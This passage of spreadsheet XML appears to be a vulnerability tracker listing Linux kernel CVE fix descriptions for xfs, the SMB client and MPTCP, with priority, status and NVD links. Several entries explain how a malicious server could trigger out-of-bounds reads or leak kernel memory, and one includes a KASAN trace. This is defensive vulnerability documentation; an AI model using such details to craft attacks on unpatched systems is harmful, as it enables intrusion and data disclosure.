xfs: initialise args-&gt;total for parent pointer updates
xfs_parent_da_args_init() builds an xfs_da_args from a zeroed
xfs_parent_args (kmem_cache_zalloc), leaving args-&gt;total == 0.
xfs_da_grow_inode_int() treats that field as a running block reservation
and subtracts from it; because it is an xfs_extlen_t (uint32_t), the
first attr-fork growth wraps it to ~0U.  That defeats the free-space
check in xfs_alloc_space_available(), and when it coincides with an AG
that has exactly zero available blocks the allocation is clamped to
maxlen 0 and returns -ENOSPC, which xfs_defer_finish_noroll() escalates
to a filesystem shutdown.
Set args-&gt;total the way the log recovery path does
(xfs_attri_recover_work(), xfs_attr_item.c:706), in the add and replace
paths that can grow the fork.  Removals and lookups never grow it, so
they leave the field alone, matching that switch.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97551</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97552</t>
        </is>
      </c>
      <c r="D500" s="5" t="inlineStr"/>
      <c r="E500" s="5" t="inlineStr"/>
      <c r="F500" s="5" t="inlineStr"/>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr"/>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: initialise error in xfs_defer_finish_one()
xfs_defer_finish_one() declares error without an initialiser and only
assigns it inside the loop over dfp-&gt;dfp_work.  When that list is empty
the loop body never runs, control falls through to the "Done with the
dfp, free it" path, and the function returns an indeterminate value.
An item-less pending item reaches this through xfs_defer_add_barrier(),
which xfs_reap_ag_blocks() uses on any CONFIG_XFS_ONLINE_REPAIR kernel.
xfs_defer_finish_noroll() treats any non-EAGAIN return as fatal, so a
non-zero stack value turns a successful barrier into a
SHUTDOWN_CORRUPT_INCORE in the middle of a repair.  Zero is the correct
result: reaching the free path means the item loop drained without a
non-zero error.</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97552</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97553</t>
        </is>
      </c>
      <c r="D501" s="5" t="inlineStr"/>
      <c r="E501" s="5" t="inlineStr"/>
      <c r="F501" s="5" t="inlineStr"/>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr"/>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: lock the healthmon when inserting unmount event
LOLLM complains that xfs_healthmon_unmount does an unlocked insert of
the unmount event into the health monitor's event list.  Fix that.</t>
        </is>
      </c>
      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97553</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97554</t>
        </is>
      </c>
      <c r="D502" s="5" t="inlineStr"/>
      <c r="E502" s="5" t="inlineStr"/>
      <c r="F502" s="5" t="inlineStr"/>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr"/>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: avoid using uninitialized SIDs in cifs_posix_to_fattr()
cifs_posix_to_fattr() ignores the return value of posix_info_parse().
When a malformed POSIX directory entry is encountered (e.g. invalid
SID lengths from an untrusted server), posix_info_parse() returns -1
without populating the 'parsed' struct.  The uninitialized stack
memory in parsed.owner and parsed.group is then passed to
sid_to_id(), which processes the garbage bytes and passes them to
request_key() to construct a SID string, potentially leaking kernel
stack contents to the userspace idmap daemon.
Fix this by checking the return value and skipping the SID-to-id
mapping when parsing fails.  The remaining fattr fields (timestamps,
mode, etc.) are populated directly from the 'info' pointer so they
are unaffected.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97554</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97556</t>
        </is>
      </c>
      <c r="D503" s="5" t="inlineStr"/>
      <c r="E503" s="5" t="inlineStr"/>
      <c r="F503" s="5" t="inlineStr"/>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr"/>
      <c r="S503" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: avoid leaking refcount when cifs_sb_tlink() fails
cifs_oplock_break() takes over the reference that
cifs_queue_oplock_break() acquired when it queued the work, and drops it
with _cifsFileInfo_put() once the break has been processed.
Only in setups with "-o multiuser", cifs_sb_tlink() may fail, at which
point cifs_oplock_break() returns without putting the file reference,
mirroring the reference leak we already fixed in the companion patch to
cifs_queue_oplock_break().
This would trigger a crash due to busy inodes on the next unmount:
  BUG: Dentry ... still in use (1) [unmount of cifs cifs]
  VFS: Busy inodes after unmount of cifs (cifs)
Drop the reference on that path as well. Doing so before the out label
mirrors the normal path, which also puts the reference before
cifs_done_oplock_break().
Found by Sashiko code review. The failure path was not exercised at
runtime.</t>
        </is>
      </c>
      <c r="T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97556</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97558</t>
        </is>
      </c>
      <c r="D504" s="5" t="inlineStr"/>
      <c r="E504" s="5" t="inlineStr"/>
      <c r="F504" s="5" t="inlineStr"/>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr"/>
      <c r="S504" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix cifsFileInfo reference leak in deferred close
When cifs_close() defers a close, it hands the cifsFileInfo reference
of the closing struct file to the queued work. Each execution of
smb2_deferred_work_close() drops one such reference.
deferred_close_scheduled can be false while the work is pending: the
workqueue clears PENDING when the callback starts to run, before the
callback clears the flag under deferred_lock. A close in that
interval requeues the running work, and the callback then clears the
flag, leaving the requeued work pending with the flag down. A later
cifs_open() can reuse the handle and its cifs_close() reaches the
same branch: queue_delayed_work() fails because the work is still
pending, but cifs_close() returns without dropping the closing file's
reference. The cifsFileInfo count stays pinned and its tlink, dentry
and server handle are leaked.
Check the return value and hand off the reference only when work was
actually queued. Otherwise, use the shared _cifsFileInfo_put(), like
the mod_delayed_work() branch above: the pending execution already
owns its reference.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97558</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97559</t>
        </is>
      </c>
      <c r="D505" s="5" t="inlineStr"/>
      <c r="E505" s="5" t="inlineStr"/>
      <c r="F505" s="5" t="inlineStr"/>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr"/>
      <c r="S505" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fail DACL rewrite when the new DACL exceeds 64K
replace_sids_and_copy_aces() and set_chmod_dacl() accumulate the size of
the DACL they build in a u16. That accumulator can wrap.
validate_dacl() caps num_aces at (dacl_size - sizeof(struct smb_acl)) /
20, i.e. 3276 for a maximally sized DACL, while each rewritten ACE can
grow to sizeof(struct smb_ace) (76 bytes) once its SID is replaced with
one carrying SID_MAX_SUB_AUTHORITIES sub-authorities. The worst case is
therefore sizeof(struct smb_acl) + 3276 * 76 = 248984 bytes, far beyond
what a u16 can hold. A wraparound is reached with 863 ACEs.
After the wraparound, ndacl_ptr-&gt;size becomes meaningless and the offset
will point anywhere in the ACE array. As a result, we will see
corruption of the DACL, which then gets sent to the server. This is not
an out-of-bounds write as the allocation now covers the worst-case
expansion, so writes will always go into the buffer.
Adjust the code to use a u32 internally and return -EOVERFLOW in the
overflow case. The operation must be refused, because a DACL can only
hold 2^16-1 bytes on the wire and larger DACLs cannot be represented.
set_chmod_dacl() carries the same pattern and is fixed the same way. It
only wraps once the source DACL comes within roughly 380 bytes of the
64K ceiling, but the failure mode is identical.</t>
        </is>
      </c>
      <c r="T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97559</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97560</t>
        </is>
      </c>
      <c r="D506" s="5" t="inlineStr"/>
      <c r="E506" s="5" t="inlineStr"/>
      <c r="F506" s="5" t="inlineStr"/>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr"/>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix one-byte OOB read in smb2_parse_native_symlink()
When parsing a share-root relative native symlink, memcpy copies
smb_target+1 (skipping the leading separator) but uses
strlen(smb_target)+1 as the length, reading one byte past the
allocated buffer.
This fixes the following KASAN splat when accessing an SMB symlink
with a target of '\a\b':
  BUG: KASAN: slab-out-of-bounds in smb2_parse_native_symlink+0x4f5/0xca0
  Read of size 5 at addr ffff88800878fe21 by task netfsfuzz-execu/1
  CPU: 1 UID: 0 PID: 1 Comm: netfsfuzz-execu Tainted: G N
  7.2.0-11943-g2709dd5ae32f-dirty #1 PREEMPT(lazy)
  Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix,
  1996)
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0x7b/0xa0
   print_report+0xd0/0x630
   kasan_report+0xe5/0x120
   kasan_check_range+0x105/0x1b0
   __asan_memcpy+0x23/0x60
   smb2_parse_native_symlink+0x4f5/0xca0
   parse_reparse_point+0x68a/0x1530
   reparse_info_to_fattr+0x752/0xa20
   cifs_get_fattr+0x873/0x15b0
   cifs_get_inode_info+0xc0/0x310
   cifs_lookup+0x308/0xa70
   __lookup_slow+0x122/0x2b0
   lookup_slow+0x50/0x70
   path_lookupat+0x525/0xaf0
   filename_lookup+0x1f2/0x550
   vfs_statx+0xd1/0x1a0
   vfs_fstatat+0x65/0xc0
   __do_sys_newfstatat+0x9a/0x120
   do_syscall_64+0xdd/0x4a0
   entry_SYSCALL_64_after_hwframe+0x77/0x7f</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97560</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97561</t>
        </is>
      </c>
      <c r="D507" s="5" t="inlineStr"/>
      <c r="E507" s="5" t="inlineStr"/>
      <c r="F507" s="5" t="inlineStr"/>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr"/>
      <c r="S507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: honor forceuid/forcegid when mapping SIDs to uid/gid
When the administrator mounts with forceuid or forcegid (uid=/gid=
mount options), they expect all files to appear owned by the specified
user/group.  However, several code paths unconditionally called
sid_to_id() to overwrite cf_uid/cf_gid with server-provided values,
ignoring the administrator's explicit override:
  - smb311_posix_info_to_fattr() (stat via POSIX extensions)
  - cifs_posix_to_fattr() (readdir via POSIX extensions)
  - parse_sec_desc() (CIFS ACL ownership mapping)
This allowed an untrusted server to dictate local file ownership even
when the mount was configured to force specific uid/gid values.
Fix all three call sites to check CIFS_MOUNT_OVERR_UID and
CIFS_MOUNT_OVERR_GID before calling sid_to_id(), following the
same pattern already used by cifs_unix_basic_to_fattr() for unix
extensions.</t>
        </is>
      </c>
      <c r="T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97561</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97563</t>
        </is>
      </c>
      <c r="D508" s="5" t="inlineStr"/>
      <c r="E508" s="5" t="inlineStr"/>
      <c r="F508" s="5" t="inlineStr"/>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr"/>
      <c r="S508" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject out-of-bounds DataOffset in CIFSSMBRead()
The SMB1 synchronous read helper CIFSSMBRead() validates the server's
DataLength against CIFSMaxBufSize and the caller's count, but never
validates DataOffset. The copy source is formed as
	&amp;pSMBr-&gt;hdr.Protocol + le16_to_cpu(pSMBr-&gt;DataOffset)
and memcpy()'d for DataLength bytes with no check that the
[DataOffset, DataOffset + DataLength) range lies within the response
actually received from the server.
A malicious or compromised SMB1 server can return a response carrying
an in-range DataLength and a large DataOffset, driving the source
pointer past the end of the response buffer. The memcpy() then copies
adjacent kernel heap into the caller's read buffer (information
disclosure), or reads unmapped memory and oopses (denial of service).
SMB1 is not negotiated by default; reaching this code requires an
explicit vers=1.0 mount.
Both DataOffset and the received response length recorded in
rsp_iov.iov_len are relative to the start of the SMB header, so reject
the response unless DataOffset + DataLength fits within that length,
using overflow-safe arithmetic, before forming the source pointer.
The response length has been validated by the previous patch, so the
DataOffset and DataLength fields can be read safely here.
While here, make data_length unsigned. It holds a length derived from
unsigned on-the-wire fields and is only ever compared against unsigned
quantities; print it with %u accordingly, and add __func__ to the
cifs_dbg() calls in this function.</t>
        </is>
      </c>
      <c r="T508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97563</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97564</t>
        </is>
      </c>
      <c r="D509" s="5" t="inlineStr"/>
      <c r="E509" s="5" t="inlineStr"/>
      <c r="F509" s="5" t="inlineStr"/>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr"/>
      <c r="S509" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject userspace cifs.idmap descriptions
cifs.idmap key descriptions carry authority-bearing fields (owner and
group SIDs and uid/gid values in "os:"/"gs:"/"oi:"/"gi:" form) that the
cifs.idmap upcall helper treats as kernel-originating inputs.  Unlike
its sibling cifs.spnego, the cifs.idmap key type has no vet_description
hook, so userspace can create keys of this type through
request_key(2)/add_key(2) and supply those fields without CIFS origin.
A request_key(2) call with a non-NULL callout then drives a root
usermodehelper upcall (/sbin/request-key -&gt; cifs.idmap) that consumes
the unvetted description in root context.
Only accept cifs.idmap descriptions while CIFS is using its private
root_cred to request the key.  id_to_sid()/sid_to_id() already run
under override_creds(root_cred), so the kernel-originated path is
unaffected.
This mirrors commit 3da1fdf4efbc ("smb: client: reject userspace
cifs.spnego descriptions"), which applied the same restriction to
cifs.spnego.</t>
        </is>
      </c>
      <c r="T509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97564</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97565</t>
        </is>
      </c>
      <c r="D510" s="5" t="inlineStr"/>
      <c r="E510" s="5" t="inlineStr"/>
      <c r="F510" s="5" t="inlineStr"/>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr"/>
      <c r="S510" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject short READ responses in CIFSSMBRead()
CIFSSMBRead() reads DataLengthHigh, DataLength and DataOffset out of
the READ_RSP returned by the server without first checking that a
whole READ_RSP was actually received. The length of the response is
recorded in rsp_iov.iov_len, but nothing constrains it to be at least
read_rsp_size before those fields are dereferenced.
A malicious or compromised SMB1 server can return a response shorter
than the READ_RSP header, so that parsing the header itself reads past
the end of the receive buffer. SMB1 is not negotiated by default;
reaching this code requires an explicit vers=1.0 mount.
Reject the response unless it is at least read_rsp_size bytes long.</t>
        </is>
      </c>
      <c r="T510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97565</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97566</t>
        </is>
      </c>
      <c r="D511" s="5" t="inlineStr"/>
      <c r="E511" s="5" t="inlineStr"/>
      <c r="F511" s="5" t="inlineStr"/>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr"/>
      <c r="S511" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: pm: kernel: drop pending ADD_ADDR when removing ID0
The in-kernel MPTCP path manager can leave a stale ADD_ADDR announcement
entry alive when removing the id 0 endpoint. This happens because the id 0
removal path does not tear down pending announcements, unlike the non-zero
id path.
When the PM later reselects id 0 after adding another signal endpoint, it
finds the stale anno_list entry and hits WARN_ON_ONCE(mptcp_pm_is_kernel())
in mptcp_pm_announced_alloc().
Root cause: asymmetry between removal paths.
- Non-zero id path: mptcp_nl_remove_subflow_and_signal_addr() calls
  mptcp_pm_remove_announced() to clean up.
- Id 0 path: mptcp_nl_remove_id_zero_address() skips cleanup entirely.
Fix by making the id 0 path symmetric: call mptcp_pm_announced_remove()
and decrement add_addr_signaled before queuing the RM_ADDR.
Subtle detail: signal endpoints are stored in anno_list with port 0, but
msk_local carries the connection's local port. In other words, entries
linked to ID0 paths should have port == 0. A follow-up patch will ensure
that. mptcp_pm_announced_remove() uses use_port=true for comparison. So
clear the port before the lookup.</t>
        </is>
      </c>
      <c r="T511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97566</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97567</t>
        </is>
      </c>
      <c r="D512" s="5" t="inlineStr"/>
      <c r="E512" s="5" t="inlineStr"/>
      <c r="F512" s="5" t="inlineStr"/>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr"/>
      <c r="S512" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: prevent race between disconnect() and rtx
Sashiko noted that the two event can race, leading to inconsistent
status. Prevent the race using the synchronous timer stop operation.</t>
        </is>
      </c>
      <c r="T512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97567</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
